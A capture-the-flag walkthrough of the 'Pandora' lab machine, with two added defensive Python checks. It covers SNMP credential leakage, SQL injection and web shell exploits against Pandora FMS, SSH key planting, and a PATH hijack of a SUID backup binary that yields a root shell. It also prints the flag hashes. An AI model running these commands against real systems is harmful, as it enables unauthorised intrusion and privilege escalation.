Pandora

Recon

nmap_scan.log
Open 10.129.71.80:22
Open 10.129.71.80:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.71.80

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNNJGh4HcK3rlrsvCbu0kASt7NLMvAUwB51UnianAKyr9H0UBYZnOkVZhIjDea3F/CxfOQeqLpanqso/EqXcT9w=
|   256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOCMYY9DMj/I+Rfosf+yMuevI7VFIeeQfZSxq67EGxsb
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 115E49F9A03BB97DEB840A3FE185434C
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (80)


The website serves static HTML files and its form posts back to the HTML page itself, so most probably there is nothing to find on this domain.

Subdomain enumeration comes up empty-handed too:

└─$ domain='panda.htb'; ffuf -k -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -fl 908

SSH is almost never vulnerable, HTTP has nothing, and there are no subdomains or hidden paths 🤔 It feels like TCP doesn't have any vulnerabilities. Let's try a UDP scan before moving on.

SNMP

└─$ sudo nmap -n -sU -F --max-retries 1 --open panda.htb
PORT    STATE SERVICE
161/udp open  snmp

SNMP is open -> https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp

Setup for better enumeration:

└─$ sudo apt-get install snmp-mibs-downloader -y
download-mibs
# Finally comment the line saying "mibs :" in /etc/snmp/snmp.conf
sudo vi /etc/snmp/snmp.conf

Start enumerating:

└─$ snmpbulkwalk -c public -v2c 10.129.71.80 . | tee snmp.log
...
HOST-RESOURCES-MIB::hrSWRunParameters.972 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
HOST-RESOURCES-MIB::hrSWRunParameters.982 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
HOST-RESOURCES-MIB::hrSWRunParameters.984 = ""
HOST-RESOURCES-MIB::hrSWRunParameters.989 = STRING: "-o -p -- \\u --noclear tty1 linux"
HOST-RESOURCES-MIB::hrSWRunParameters.1038 = ""
HOST-RESOURCES-MIB::hrSWRunParameters.1039 = STRING: "-k start"
HOST-RESOURCES-MIB::hrSWRunParameters.1125 = STRING: "-u daniel -p HotelBabylon23"
...
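The finding above is worth turning into a check: hrSWRunParameters is the argv of every running process, and a default "public" community string hands it to anyone. The following is an added example, not part of the original writeup, that scans walk output for password-style arguments and masks what it finds; the sample lines are copied from the snmp.log above, and the flag patterns are a heuristic.

```python
import re
from typing import Dict, List

# Constructed sample: a subset of the page's snmp.log, copied verbatim.
SAMPLE_WALK = r'''HOST-RESOURCES-MIB::hrSWRunParameters.972 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
HOST-RESOURCES-MIB::hrSWRunParameters.982 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
HOST-RESOURCES-MIB::hrSWRunParameters.984 = ""
HOST-RESOURCES-MIB::hrSWRunParameters.989 = STRING: "-o -p -- \\u --noclear tty1 linux"
HOST-RESOURCES-MIB::hrSWRunParameters.1039 = STRING: "-k start"
HOST-RESOURCES-MIB::hrSWRunParameters.1125 = STRING: "-u daniel -p HotelBabylon23"
'''

LINE_RE = re.compile(r'hrSWRunParameters\.(\d+) = STRING: "(.*)"$')
# Password-style flags (heuristic): -p VALUE, -pVALUE, --password VALUE, --password=VALUE
CRED_RE = re.compile(r'''(?<!\S)(--password|--passwd|--pass|-p)(?:=|\s+)?([^\s'"]+)''')
USER_RE = re.compile(r'''(?<!\S)(?:--user|-u)(?:=|\s+)([^\s'"]+)''')


def mask(secret: str) -> str:
    """Keep only a two-character prefix so the report never re-leaks the secret."""
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 2 else "***"


def find_exposed_credentials(walk_output: str) -> List[Dict[str, str]]:
    """Flag processes whose command line carries a password-style argument."""
    findings = []
    for line in walk_output.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        pid, argv = m.groups()
        user = USER_RE.search(argv)
        for flag, value in CRED_RE.findall(argv):
            # False-positive filters: snmpd's "-p /run/snmpd.pid" is a pid file,
            # and agetty's "-p --" means -p took no argument at all.
            if value.startswith(("/", "-")):
                continue
            findings.append({"pid": pid, "user": user.group(1) if user else "",
                             "flag": flag, "value": mask(value), "argv": argv})
    return findings


if __name__ == "__main__":
    for f in find_exposed_credentials(SAMPLE_WALK):
        print(f"pid {f['pid']}: {f['flag']} for user {f['user']!r} -> {f['value']}")
```

Run it against a real `snmpbulkwalk ... | tee snmp.log` capture to see which of your own services pass secrets on the command line; the fix is a config file or environment variable, not a better community string.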

SSH (daniel)

└─$ sshpass -p HotelBabylon23 ssh daniel@panda.htb
daniel@pandora:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)
daniel@pandora:/var/www/pandora/pandora_console$ cat /etc/apache2/sites-enabled/pandora.conf
<VirtualHost localhost:80>
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  </Directory>
  ErrorLog /var/log/apache2/error.log
  CustomLog /var/log/apache2/access.log combined
</VirtualHost>

Port forward the application

└─$ sshpass -p HotelBabylon23 ssh daniel@panda.htb -L 8000:0:80

From the frontend we see the version is v7.0NG.742_FIX_PERL2020; it can also be found in config_process.php:

daniel@pandora:/var/www/pandora/pandora_console$ cat ./include/config_process.php | grep _version
$build_version = 'PC200103';
$pandora_version = 'v7.0NG.742_FIX_PERL2020';

SSH (matt)

exploit-CVE-2020-5844

└─$ git clone -q https://github.com/UNICORDev/exploit-CVE-2020-5844.git
└─$ py exploit-CVE-2020-5844/exploit-CVE-2020-5844.py -t 127.0.0.1 8000 -u daniel HotelBabylon23
UNICORD: Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution
OPTIONS: Web Shell Mode
USERNAME: daniel
PASSWORD: HotelBabylon23
WEBFILE: unicord.php
WEBSITE: http://127.0.0.1:8000/pandora_console
PHPSESS: dee7h37beh357356o48mem3d4m
ERRORED: Invalid credentials!
EXPLOIT: Connected to website! Status Code: 200
EXPLOIT: Logged into Pandora FMS!
EXPLOIT: Web shell uploaded!
SUCCESS: Web shell available at: http://127.0.0.1:8000/pandora_console/images/unicord.php?cmd=whoami

└─$ curl http://127.0.0.1:8000/pandora_console/images/unicord.php?cmd=whoami
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>

The CVE exploit failed. We can't read the config either, as only matt can read it:

daniel@pandora:/var/www/pandora/pandora_console$ ls -alh ./include/config.php
-rw------- 1 matt matt 413 Dec  3  2021 ./include/config.php

Pandora_v7.0NG.742_exploit_unauthenticated -> Pandora FMS 742: Critical Code Vulnerabilities Explained

└─$ git clone -q https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated.git
└─$ py Pandora_v7.0NG.742_exploit_unauthenticated/sqlpwn.py -t 127.0.0.1:8000
URL:  http://127.0.0.1:8000/pandora_console
[+] Sending Injection Payload
[+] Requesting Session
[+] Admin Session Cookie : nudijm8drqtrr94j5qkf6nuv5r
[+] Sending Payload
[+] Respose : 200
[+] Pwned :)
[+] If you want manual Control : http://127.0.0.1:8000/pandora_console/images/pwn.php?test=
CMD > id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
---
└─$ ssh-keygen -f id_rsa -P x -q && cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEKIXJzrVhoHAuwPoxW4vwgWOBSZXtmH8CG08we2Z84v woyag@kraken
---
CMD > ls /home/matt -alh
total 24K
drwxr-xr-x 2 matt matt 4.0K Dec  7  2021 .
drwxr-xr-x 4 root root 4.0K Dec  7  2021 ..
lrwxrwxrwx 1 matt matt    9 Jun 11  2021 .bash_history -> /dev/null
-rw-r--r-- 1 matt matt  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 matt matt 3.7K Feb 25  2020 .bashrc
-rw-r--r-- 1 matt matt  807 Feb 25  2020 .profile
-rw-r----- 1 root matt   33 Dec 11 19:02 user.txt

CMD > mkdir /home/matt/.ssh
CMD > echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEKIXJzrVhoHAuwPoxW4vwgWOBSZXtmH8CG08we2Z84v woyag@kraken' > /home/matt/.ssh/authorized_keys
└─$ ssh -i id_rsa matt@panda.htb
matt@pandora:~$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)

User.txt

matt@pandora:~$ cat user.txt
c3ad8efa5ad16bc60cec796cb0650520

Privilege Escalation

matt@pandora:/var/www/pandora/pandora_console/include$ cat config.php
<?php
// File generated by centos kickstart
$config["dbtype"] = "mysql";
$config["dbname"]="pandora";
$config["dbuser"]="pandora";
$config["dbpass"]="PandoraFMSSecurePass2021";
$config["dbhost"]="localhost";
$config["homedir"]="/var/www/pandora/pandora_console";
$config["homeurl"]="/pandora_console";
error_reporting(0);
$ownDir = dirname(__FILE__) . '/';
include ($ownDir . "config_process.php");
?>
matt@pandora:/var/www/pandora/pandora_console/include$ mysql -u 'pandora' -p'PandoraFMSSecurePass2021' -e 'SHOW DATABASES;'
+--------------------+
| Database           |
+--------------------+
| information_schema |
| pandora            |
+--------------------+
matt@pandora:/var/www/pandora/pandora_console/include$ mysql -u 'pandora' -p'PandoraFMSSecurePass2021' pandora -e 'SHOW TABLES;'
| tpassword_history                  |
matt@pandora:/var/www/pandora/pandora_console/include$ mysql -u 'pandora' -p'PandoraFMSSecurePass2021' pandora -e 'SELECT * FROM tpassword_history;'
+---------+---------+----------------------------------+---------------------+---------------------+
| id_pass | id_user | password                         | date_begin          | date_end            |
+---------+---------+----------------------------------+---------------------+---------------------+
|       1 | matt    | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 | 0000-00-00 00:00:00 |
|       2 | daniel  | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 | 0000-00-00 00:00:00 |
+---------+---------+----------------------------------+---------------------+---------------------+

No sudo for us, but there are SUID binaries:

matt@pandora:/tmp$ find / -perm -4000 2>/dev/null
...
/usr/bin/pandora_backup
...
└─$ scp -i id_rsa matt@panda.htb:/usr/bin/pandora_backup .
└─$ file pandora_backup
pandora_backup: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7174c3b04737ad11254839c20c8dab66fce55af8, for GNU/Linux 3.2.0, not stripped
└─$ strings pandora_backup | grep -vE '^[._;]|GLIBC'
/lib64/ld-linux-x86-64.so.2
puts
setreuid
system
getuid
geteuid
libc.so.6
u/UH
[]A\A]A^A_
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*
Backup failed!
Check your permissions!
Backup successful!
Terminating program!
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
completed.0
frame_dummy
backup.c
main

The binary invokes tar by a relative name instead of an absolute path, so we can hijack tar with anything we want.

matt@pandora:/tmp$ nano tar
matt@pandora:/tmp$ cat tar
#!/bin/bash
mkdir /root/.ssh
echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEKIXJzrVhoHAuwPoxW4vwgWOBSZXtmH8CG08we2Z84v woyag@kraken' >> /root/.ssh/authorized_keys
install -m4777 /bin/bash /tmp/rootbash
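To make the root cause concrete, here is an added example (not the binary's own code, and not from the original writeup): it emulates the PATH lookup that system() performs for a relative program name, audits the command string recovered from the strings output, and shows the hardened form. The constructed fake filesystem and the /usr/bin/tar location are assumptions.

```python
import os
import shlex
import subprocess
from typing import Callable, Dict, Optional

# The command string found in the page's pandora_backup binary (from its strings output).
BACKUP_CMD = "tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*"


def _real_is_exec(path: str) -> bool:
    return os.access(path, os.X_OK)


def resolve_like_shell(program: str, path_value: str,
                       is_exec: Callable[[str], bool] = _real_is_exec) -> Optional[str]:
    """Emulate what /bin/sh does for system(): the first PATH entry holding an
    executable of that name wins. is_exec is injectable so the lookup can be
    simulated against a constructed filesystem instead of the real one."""
    if "/" in program:  # an explicit path is never searched in PATH
        return program if is_exec(program) else None
    for directory in path_value.split(":"):
        candidate = os.path.join(directory or ".", program)
        if is_exec(candidate):
            return candidate
    return None


def audit_system_call(command: str, path_value: str,
                      is_exec: Callable[[str], bool] = _real_is_exec) -> Dict[str, object]:
    """Report whether a system()-style command lets the caller's PATH pick the
    binary. For a SUID program that is fatal: the unprivileged caller sets PATH."""
    program = shlex.split(command)[0]
    relative = "/" not in program
    return {"program": program, "relative": relative,
            "resolved": resolve_like_shell(program, path_value, is_exec),
            "caller_controls_binary": relative}


def hardened_backup(dry_run: bool = True):
    """Hardened replacement: absolute path, argv list (no shell, so no glob; the
    directory itself is archived) and a fixed minimal environment, so the
    caller's PATH and LD_* variables are ignored."""
    argv = ["/usr/bin/tar", "-cvf", "/root/.backup/pandora-backup.tar.gz",
            "/var/www/pandora/pandora_console"]
    env = {"PATH": "/usr/bin:/bin"}
    if dry_run:
        return argv, env
    return subprocess.run(argv, env=env, check=False).returncode


if __name__ == "__main__":
    fake_fs = {"/tmp/tar", "/usr/bin/tar"}  # constructed: a rogue /tmp/tar exists
    print(audit_system_call(BACKUP_CMD, "/tmp:/usr/bin", lambda p: p in fake_fs))
    print(audit_system_call(BACKUP_CMD, "/usr/bin:/bin", lambda p: p in fake_fs))
```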

SSH as root doesn't work because there is a deny rule:

matt@pandora:/tmp$ cat /etc/ssh/sshd_config | grep Deny
DenyUsers root

Root.txt

matt@pandora:/tmp$ /tmp/rootbash -p
rootbash-5.0# cat /root/root.txt
3b7410b14d3d60daf56dc908f89798de
